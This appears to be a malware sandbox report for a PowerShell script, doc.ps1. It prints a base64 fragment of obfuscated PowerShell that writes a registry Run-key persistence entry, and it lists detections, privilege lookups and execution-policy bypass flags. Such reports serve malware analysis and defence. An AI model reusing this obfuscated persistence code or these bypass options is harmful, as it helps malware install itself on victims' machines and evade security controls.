CAALQBmACAAJwAwAH0AUgAnACwAJwBDAFUAOgB7ADAAfQBTACcALAAnAG8AZgB0AHsAMAB9AFcAaQBuAGQAbwB3ACcALAAnAEsAJwAsACcAZQByAHMAaQBvAG4AewAnACwAJwBIACcALAAnAHUAbgAnACwAJwBPAEYAVABXAEEAUgBFAHsAMAB9AE0AaQBjACcALAAnAHMAewAwAH0AQwB1AHIAcgBlACcALAAnAHIAJwAsACcAbgB0AFYAJwAsACcAbwBzACcAKQApAC0AZgAgAFsAQwBIAGEAcgBdADkAMgApACAALQBOAGEAbQBlACAAJAB7AFIAYABOAE0AfQAgAC0AVgBhAGwAdQBlACAAJAB7AGYAcwBgAFQAUgB9ACAAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAFMAdAByAGkAJwAsACcAbgBnACcAKQA7AA==

File has been identified by 2 AntiVirus engines on VirusTotal as malicious (2 events)

Symantec	CL.Downloader!gen10
ESET-NOD32	PowerShell/Obfuscated.Z suspicious

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 27, 2023, 10:20 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

Creates a suspicious Powershell process (2 events)

option	-ep bypass				value	Attempts to bypass execution policy
option	-nop				value	Does not load current user profile

The process powershell.exe wrote an executable file to disk (1 event)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

doc.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All